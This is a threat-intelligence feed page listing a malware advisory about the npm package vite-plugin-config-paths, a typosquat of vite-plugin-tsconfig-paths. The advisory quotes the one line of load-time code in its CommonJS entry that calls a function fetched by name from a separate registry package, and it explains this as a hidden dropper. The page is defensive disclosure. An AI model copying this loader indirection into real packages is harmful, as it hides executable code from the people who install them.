Threats Tagged 'mal-2026-10574'
View all threats tagged with 'mal-2026-10574'. Filter and sort to focus on specific types of threats.
Stop chasing alerts. Route them.
Start free, then upgrade once to turn Radar into an automated delivery engine for your security stack.
Custom feeds / Automations: email, Slack, webhooks, SIEM/MISP / API access (baseline limits)
API access activates after upgrading in Console -> Billing.
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.
Filter Threats
Narrow down the results by type, severity, or affected countries
Threats Tagged 'mal-2026-10574'
Click on any threat for detailed analysis and mitigation recommendations
MAL-2026-10574: Malicious code in vite-plugin-config-paths (npm) 0 --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (96c7307466b955fa9b453e949ec2fda3153e5c444b906eed5e3bc88d190a33a7) Package name impersonates the widely-used vite-plugin-tsconfig-paths (the package.json homepage points to the legitimate plugin's README), and the README markets the same API. The CJS entry (index.js) contains top-level code that is absent from the ESM entry (index.mjs): `const { getFunc } = require("url-func-registry"); const jsonInst = getFunc("JsonS"); const json_provider = jsonInst();`. On `require()` of this package (the resolution path Node uses for CommonJS consumers), a function looked up by string name from a transitive `url-func-registry` dependency is invoked at load time. This registry-lookup indirection hides the executed code behind a named-function table populated by a separate package, so the actual behavior can be altered by changing that transitive without republishing this one. The ESM build performs no such call, indicating the CJS output was modified after normal build. The combination of name impersonation of a popular target plus divergent, indirection-based load-time execution not part of the advertised tsconfig-path resolution logic is the shape of a typosquat dropper. Join the discussion | GCVE Database | 07/14/2026, 06:04:15 UTC Added: 07/14/2026, 09:20:17 UTC |
Showing 1 to 1 of 1 result